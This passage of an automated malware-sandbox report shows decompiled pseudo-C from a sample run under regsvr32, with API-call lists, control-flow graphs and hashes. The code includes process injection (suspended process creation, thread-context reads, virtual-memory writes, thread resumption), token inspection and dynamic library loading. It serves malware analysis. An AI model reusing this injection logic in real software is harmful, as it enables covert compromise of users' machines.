							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E05B98BF4(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























                                                                                                                                                                        0x05b9d80a
                                                                                                                                                                        0x05b9d813
                                                                                                                                                                        0x05b9d816
                                                                                                                                                                        0x05b9d818
                                                                                                                                                                        0x05b9d81d
                                                                                                                                                                        0x05b9d81f
                                                                                                                                                                        0x05b9d822
                                                                                                                                                                        0x05b9d824
                                                                                                                                                                        0x05b9d958
                                                                                                                                                                        0x05b9d958
                                                                                                                                                                        0x05b9d82a
                                                                                                                                                                        0x05b9d833
                                                                                                                                                                        0x05b9d83c
                                                                                                                                                                        0x05b9d841
                                                                                                                                                                        0x05b9d844
                                                                                                                                                                        0x05b9d849
                                                                                                                                                                        0x05b9d945
                                                                                                                                                                        0x05b9d94b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d954
                                                                                                                                                                        0x05b9d84f
                                                                                                                                                                        0x05b9d857
                                                                                                                                                                        0x05b9d859
                                                                                                                                                                        0x05b9d85c
                                                                                                                                                                        0x05b9d86b
                                                                                                                                                                        0x05b9d876
                                                                                                                                                                        0x05b9d87c
                                                                                                                                                                        0x05b9d881
                                                                                                                                                                        0x05b9d883
                                                                                                                                                                        0x05b9d890
                                                                                                                                                                        0x05b9d898
                                                                                                                                                                        0x05b9d8a3
                                                                                                                                                                        0x05b9d8ae
                                                                                                                                                                        0x05b9d8b2
                                                                                                                                                                        0x05b9d8b4
                                                                                                                                                                        0x05b9d8bd
                                                                                                                                                                        0x05b9d8c4
                                                                                                                                                                        0x05b9d8c9
                                                                                                                                                                        0x05b9d8cb
                                                                                                                                                                        0x05b9d8d0
                                                                                                                                                                        0x05b9d8d6
                                                                                                                                                                        0x05b9d8d8
                                                                                                                                                                        0x05b9d8d8
                                                                                                                                                                        0x05b9d8d9
                                                                                                                                                                        0x05b9d8d9
                                                                                                                                                                        0x05b9d8df
                                                                                                                                                                        0x05b9d8df
                                                                                                                                                                        0x05b9d8e2
                                                                                                                                                                        0x05b9d8e2
                                                                                                                                                                        0x05b9d898
                                                                                                                                                                        0x05b9d8e9
                                                                                                                                                                        0x05b9d8ed
                                                                                                                                                                        0x05b9d8ef
                                                                                                                                                                        0x05b9d8f8
                                                                                                                                                                        0x05b9d8f8
                                                                                                                                                                        0x05b9d8fe
                                                                                                                                                                        0x05b9d906
                                                                                                                                                                        0x05b9d909
                                                                                                                                                                        0x05b9d911
                                                                                                                                                                        0x05b9d911
                                                                                                                                                                        0x05b9d914
                                                                                                                                                                        0x05b9d915
                                                                                                                                                                        0x05b9d91b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d91b
                                                                                                                                                                        0x05b9d924
                                                                                                                                                                        0x05b9d927
                                                                                                                                                                        0x05b9d928
                                                                                                                                                                        0x05b9d92d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d933
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d933
                                                                                                                                                                        0x05b9d933
                                                                                                                                                                        0x05b9d936
                                                                                                                                                                        0x05b9d93c
                                                                                                                                                                        0x05b9d940

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                          • Part of subcall function 05B9BC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 05B9BCC6
                                                                                                                                                                          • Part of subcall function 05B9D959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 05B9D9BB
                                                                                                                                                                          • Part of subcall function 05B9D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05B9DA04
                                                                                                                                                                          • Part of subcall function 05B9D959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 05B9DA21
                                                                                                                                                                          • Part of subcall function 05B9D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 05B9DA42
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000001), ref: 05B9D8B4
                                                                                                                                                                          • Part of subcall function 05B9DA57: ResumeThread.KERNELBASE(?,05B9D8C2,?,?,00000001), ref: 05B9DA5F
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 05B9D8DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2212882986-0
                                                                                                                                                                        • Opcode ID: 76dce4bda0b224b2715bb2e819d865437f2c163d0c6220fed7179586b5e5c24d
                                                                                                                                                                        • Instruction ID: 3e176d5c3ba3f38bf9c5bd7555ad3e50b1174f5431072e6fa814c60abff1b347
                                                                                                                                                                        • Opcode Fuzzy Hash: 76dce4bda0b224b2715bb2e819d865437f2c163d0c6220fed7179586b5e5c24d
                                                                                                                                                                        • Instruction Fuzzy Hash: 01414175A00209AFDF14EF96D989EFDB7B9FF48310F1040B9E505A7151DB30B9458B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B964EF Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x5baf818; // 0x5d5f8b0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E05B98BC9();
				E05B99591();
				 *0x5baf830 = _a4;
				E05BA3CD5(_a4);
				 *_t49 = 0xf43;
				 *0x5baf818 = E05B9F05C(0x5baca50, 0x138);
				 *_t49 = 0x111;
				_t23 = E05B99DF2(0x5baca50);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E05B98BAF();
					 *_t49 = 0x40e;
					_t28 = E05B99CB5(E05B9109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x5baf828 = E05B9F05C(0x5bacbb8, _t48);
						E05B96370(_t48, __eflags);
						E05B98BF4( &_a8, 0xfffffffe);
						_t36 =  *0x5baf818; // 0x5d5f8b0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E05B96298, 0, 0,  &_v8);
					 *0x5baf83c = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E05B98BAF();
				goto L3;
			}













                                                                                                                                                                        0x05b964f2
                                                                                                                                                                        0x05b964f7
                                                                                                                                                                        0x05b965db
                                                                                                                                                                        0x05b965df
                                                                                                                                                                        0x05b965d4
                                                                                                                                                                        0x05b965d6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b965d6
                                                                                                                                                                        0x05b965e1
                                                                                                                                                                        0x05b965eb
                                                                                                                                                                        0x05b96556
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b96556
                                                                                                                                                                        0x05b964fd
                                                                                                                                                                        0x05b96502
                                                                                                                                                                        0x05b9650b
                                                                                                                                                                        0x05b96510
                                                                                                                                                                        0x05b9651a
                                                                                                                                                                        0x05b9652b
                                                                                                                                                                        0x05b96530
                                                                                                                                                                        0x05b96537
                                                                                                                                                                        0x05b9653c
                                                                                                                                                                        0x05b9653e
                                                                                                                                                                        0x05b96541
                                                                                                                                                                        0x05b9654d
                                                                                                                                                                        0x05b9654e
                                                                                                                                                                        0x05b9655a
                                                                                                                                                                        0x05b9655f
                                                                                                                                                                        0x05b9656e
                                                                                                                                                                        0x05b96573
                                                                                                                                                                        0x05b96576
                                                                                                                                                                        0x05b96578
                                                                                                                                                                        0x05b96581
                                                                                                                                                                        0x05b9658c
                                                                                                                                                                        0x05b96591
                                                                                                                                                                        0x05b9659c
                                                                                                                                                                        0x05b965a1
                                                                                                                                                                        0x05b965ab
                                                                                                                                                                        0x05b965ab
                                                                                                                                                                        0x05b965c5
                                                                                                                                                                        0x05b965c8
                                                                                                                                                                        0x05b965cb
                                                                                                                                                                        0x05b965d0
                                                                                                                                                                        0x05b965d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b965d2
                                                                                                                                                                        0x05b96550
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,05B96502), ref: 05B98BD2
                                                                                                                                                                          • Part of subcall function 05B9F05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,05BACA50,?,05B9652B,?), ref: 05B9F07E
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 05B96541
                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,05B96298,00000000,00000000,?), ref: 05B965C8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 607385197-0
                                                                                                                                                                        • Opcode ID: 2548ca075a3df4e66856b382559e3431a0b19e4ec0eb548e7e2673c3124c6cd3
                                                                                                                                                                        • Instruction ID: 88386679ad2dfae234be5a17279436e8d6892b1897ad21ce80961758a6a6ae8d
                                                                                                                                                                        • Opcode Fuzzy Hash: 2548ca075a3df4e66856b382559e3431a0b19e4ec0eb548e7e2673c3124c6cd3
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F214CB1614208EBDF48AF78D84AABD3BE8EB05310F1085BAB519CB180DF74F580CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9F05C Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 307 5b9f05c-5b9f07c call 5b99dd8 310 5b9f07e-5b9f084 GetModuleHandleA 307->310 311 5b9f086-5b9f08b LoadLibraryA 307->311 312 5b9f08d-5b9f08f 310->312 311->312 313 5b9f09e-5b9f0ac call 5b98b9c 312->313 314 5b9f091-5b9f096 call 5b9f011 312->314 317 5b9f09b-5b9f09c 314->317 317->313
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E05B9F05C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E05B99DD8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf43) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E05B9F011(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E05B98B9C( &_v8);
				return _t25;
			}










                                                                                                                                                                        0x05b9f05f
                                                                                                                                                                        0x05b9f062
                                                                                                                                                                        0x05b9f068
                                                                                                                                                                        0x05b9f06a
                                                                                                                                                                        0x05b9f06f
                                                                                                                                                                        0x05b9f071
                                                                                                                                                                        0x05b9f07b
                                                                                                                                                                        0x05b9f07c
                                                                                                                                                                        0x05b9f08b
                                                                                                                                                                        0x05b9f07e
                                                                                                                                                                        0x05b9f07e
                                                                                                                                                                        0x05b9f07e
                                                                                                                                                                        0x05b9f08f
                                                                                                                                                                        0x05b9f096
                                                                                                                                                                        0x05b9f09c
                                                                                                                                                                        0x05b9f09c
                                                                                                                                                                        0x05b9f0a1
                                                                                                                                                                        0x05b9f0ac

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,05BACA50,?,05B9652B,?), ref: 05B9F07E
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000,?,?,?,05BACA50,?,05B9652B,?), ref: 05B9F08B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4133054770-0
                                                                                                                                                                        • Opcode ID: 983453fca2f9c590f5b7bfb0098ba8e88880c4c4cb8041c6ea13254c78b64c70
                                                                                                                                                                        • Instruction ID: fac5c919fc1198b0062a1701ab07a13b6e2de90157bb54a7bc87cc8321c9b49b
                                                                                                                                                                        • Opcode Fuzzy Hash: 983453fca2f9c590f5b7bfb0098ba8e88880c4c4cb8041c6ea13254c78b64c70
                                                                                                                                                                        • Instruction Fuzzy Hash: C2F0AE31300114ABDB1D9F6DE8458BAB7EDDF4426471040BAF506D3150DE71BE4086A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9C8C9 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 319 5b9c8c9-5b9c8e8 call 5b9c79e 322 5b9c8ee-5b9c905 call 5b9c7f5 319->322 323 5b9c983-5b9c986 319->323 326 5b9c965-5b9c973 FindCloseChangeNotification 322->326 327 5b9c907-5b9c928 322->327 328 5b9c981 326->328 329 5b9c975-5b9c980 call 5b98bf4 326->329 327->326 333 5b9c92a-5b9c92c 327->333 328->323 329->328 334 5b9c958-5b9c963 333->334 335 5b9c92e-5b9c931 333->335 334->326 336 5b9c934-5b9c943 335->336 339 5b9c955-5b9c957 336->339 340 5b9c945-5b9c951 336->340 339->334 340->336 341 5b9c953 340->341 341->334
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E05B9C8C9(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E05B9C79E(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E05B9C7F5(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E05B98BF4( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x5baf820; // 0x5d5faa0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x5baf820; // 0x5d5faa0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x5baf820; // 0x5d5faa0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                                                                                                                                                                        0x05b9c8d0
                                                                                                                                                                        0x05b9c8d2
                                                                                                                                                                        0x05b9c8d9
                                                                                                                                                                        0x05b9c8db
                                                                                                                                                                        0x05b9c8de
                                                                                                                                                                        0x05b9c8e3
                                                                                                                                                                        0x05b9c8e8
                                                                                                                                                                        0x05b9c8f2
                                                                                                                                                                        0x05b9c8f5
                                                                                                                                                                        0x05b9c8f8
                                                                                                                                                                        0x05b9c8fd
                                                                                                                                                                        0x05b9c8ff
                                                                                                                                                                        0x05b9c905
                                                                                                                                                                        0x05b9c965
                                                                                                                                                                        0x05b9c96d
                                                                                                                                                                        0x05b9c973
                                                                                                                                                                        0x05b9c97a
                                                                                                                                                                        0x05b9c980
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c981
                                                                                                                                                                        0x05b9c90a
                                                                                                                                                                        0x05b9c90b
                                                                                                                                                                        0x05b9c90c
                                                                                                                                                                        0x05b9c90d
                                                                                                                                                                        0x05b9c90e
                                                                                                                                                                        0x05b9c90f
                                                                                                                                                                        0x05b9c910
                                                                                                                                                                        0x05b9c911
                                                                                                                                                                        0x05b9c916
                                                                                                                                                                        0x05b9c918
                                                                                                                                                                        0x05b9c91d
                                                                                                                                                                        0x05b9c91e
                                                                                                                                                                        0x05b9c928
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c92c
                                                                                                                                                                        0x05b9c958
                                                                                                                                                                        0x05b9c958
                                                                                                                                                                        0x05b9c960
                                                                                                                                                                        0x05b9c963
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c963
                                                                                                                                                                        0x05b9c92e
                                                                                                                                                                        0x05b9c92e
                                                                                                                                                                        0x05b9c931
                                                                                                                                                                        0x05b9c934
                                                                                                                                                                        0x05b9c934
                                                                                                                                                                        0x05b9c937
                                                                                                                                                                        0x05b9c939
                                                                                                                                                                        0x05b9c943
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c948
                                                                                                                                                                        0x05b9c949
                                                                                                                                                                        0x05b9c94c
                                                                                                                                                                        0x05b9c951
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c953
                                                                                                                                                                        0x05b9c957
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c957
                                                                                                                                                                        0x05b9c986

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B9C79E: GetCurrentThread.KERNEL32 ref: 05B9C7B1
                                                                                                                                                                          • Part of subcall function 05B9C79E: OpenThreadToken.ADVAPI32(00000000,?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7B8
                                                                                                                                                                          • Part of subcall function 05B9C79E: GetLastError.KERNEL32(?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7BF
                                                                                                                                                                          • Part of subcall function 05B9C79E: OpenProcessToken.ADVAPI32(00000000,?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7E4
                                                                                                                                                                          • Part of subcall function 05B9C7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,05B90000,00000000,00000000,?,05B9C876,00000000,00000000,?,05B9C89F), ref: 05B9C810
                                                                                                                                                                          • Part of subcall function 05B9C7F5: GetLastError.KERNEL32(?,05B9C876,00000000,00000000,?,05B9C89F,00001644,?,05B9DFCE), ref: 05B9C817
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,05B90000), ref: 05B9C96D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1806447117-0
                                                                                                                                                                        • Opcode ID: a106adbb036d27626f462960b5b31d7d9795c96ea0695aafe148e653b2223aef
                                                                                                                                                                        • Instruction ID: 0b6cc6f2dd550ef67b3fd40a8249d39d1a163ac288d4d4621f0c417c8f293cad
                                                                                                                                                                        • Opcode Fuzzy Hash: a106adbb036d27626f462960b5b31d7d9795c96ea0695aafe148e653b2223aef
                                                                                                                                                                        • Instruction Fuzzy Hash: 93215376A04206EFDF15DFA9D889EAEBBF8FF48610B1040B9E511E7151EB30BD418B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B96298 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 342 5b96298-5b962b1 call 5b96412 GetOEMCP call 5b9df3d 347 5b962b3-5b962b4 342->347 348 5b962b6-5b962e1 call 5ba3bd5 342->348 349 5b9632b 347->349 352 5b962eb-5b962f1 call 5b9d804 348->352 353 5b962e3-5b962e9 348->353 356 5b962f6-5b962fd 352->356 354 5b96305-5b96311 353->354 357 5b96323 call 5b935a1 354->357 358 5b96313-5b96318 call 5b9611b 354->358 359 5b9631a-5b96321 356->359 360 5b962ff 356->360 364 5b96328-5b9632a 357->364 358->364 359->357 359->364 360->354 364->349
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B96298(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E05B96412();
				GetOEMCP();
				_t13 = E05B9DF3D(__fp0); // executed
				 *0x5baf81c = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x5baf81c; // 0x5d5fbe8
					_t2 = _t14 + 0x224; // 0x5b90000
					E05BA3BD5( *_t2);
					_t26 =  *0x5baf81c; // 0x5d5fbe8
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x5b90000, executed
						_t26 =  *_t7;
						_t16 = E05B9D804( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x5baf81c; // 0x5d5fbe8
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E05B935A1();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x5baf81c; // 0x5d5fbe8
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E05B9611B(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











                                                                                                                                                                        0x05b96298
                                                                                                                                                                        0x05b96298
                                                                                                                                                                        0x05b9629d
                                                                                                                                                                        0x05b962a4
                                                                                                                                                                        0x05b962a9
                                                                                                                                                                        0x05b962b1
                                                                                                                                                                        0x05b962ba
                                                                                                                                                                        0x05b962c0
                                                                                                                                                                        0x05b962c5
                                                                                                                                                                        0x05b962cb
                                                                                                                                                                        0x05b962d0
                                                                                                                                                                        0x05b962d6
                                                                                                                                                                        0x05b962d7
                                                                                                                                                                        0x05b962e1
                                                                                                                                                                        0x05b962eb
                                                                                                                                                                        0x05b962eb
                                                                                                                                                                        0x05b962f1
                                                                                                                                                                        0x05b962f6
                                                                                                                                                                        0x05b962f8
                                                                                                                                                                        0x05b962fd
                                                                                                                                                                        0x05b9631a
                                                                                                                                                                        0x05b96321
                                                                                                                                                                        0x05b96328
                                                                                                                                                                        0x05b96328
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9632a
                                                                                                                                                                        0x05b96323
                                                                                                                                                                        0x05b96323
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b96323
                                                                                                                                                                        0x05b962ff
                                                                                                                                                                        0x05b96305
                                                                                                                                                                        0x05b96305
                                                                                                                                                                        0x05b9630a
                                                                                                                                                                        0x05b96311
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b96313
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b96313
                                                                                                                                                                        0x05b962e3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b962e3
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetOEMCP.KERNEL32 ref: 05B9629D
                                                                                                                                                                          • Part of subcall function 05B9DF3D: GetCurrentProcessId.KERNEL32 ref: 05B9DF64
                                                                                                                                                                          • Part of subcall function 05B9DF3D: LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 05B9E057
                                                                                                                                                                          • Part of subcall function 05B9DF3D: GetLastError.KERNEL32 ref: 05B9E05E
                                                                                                                                                                          • Part of subcall function 05B9DF3D: GetSystemMetrics.USER32(00001000), ref: 05B9E06E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AccountCurrentErrorLastLookupMetricsProcessSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 253334094-0
                                                                                                                                                                        • Opcode ID: 6a96a2b910a7cf9c0bb757a4a823768e0e5dcbab9e726bb27f03164b3e359fbb
                                                                                                                                                                        • Instruction ID: 1290f6794dfd3d232a60c84a43db2f6fc0db6fe00bbe9d0a467b7f0ef91597b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a96a2b910a7cf9c0bb757a4a823768e0e5dcbab9e726bb27f03164b3e359fbb
                                                                                                                                                                        • Instruction Fuzzy Hash: 66011A35618212CECB18EF68E54ABF6BBE1FB06310F0582F6E445CB111CB70B481CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9C879 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 365 5b9c879-5b9c892 367 5b9c894-5b9c895 365->367 368 5b9c896-5b9c8a3 call 5b9c862 365->368 371 5b9c8b9-5b9c8c4 FindCloseChangeNotification 368->371 372 5b9c8a5-5b9c8a8 368->372 375 5b9c8c6-5b9c8c8 371->375 373 5b9c8aa-5b9c8af 372->373 374 5b9c8b5-5b9c8b7 372->374 373->374 374->375
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9C879(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
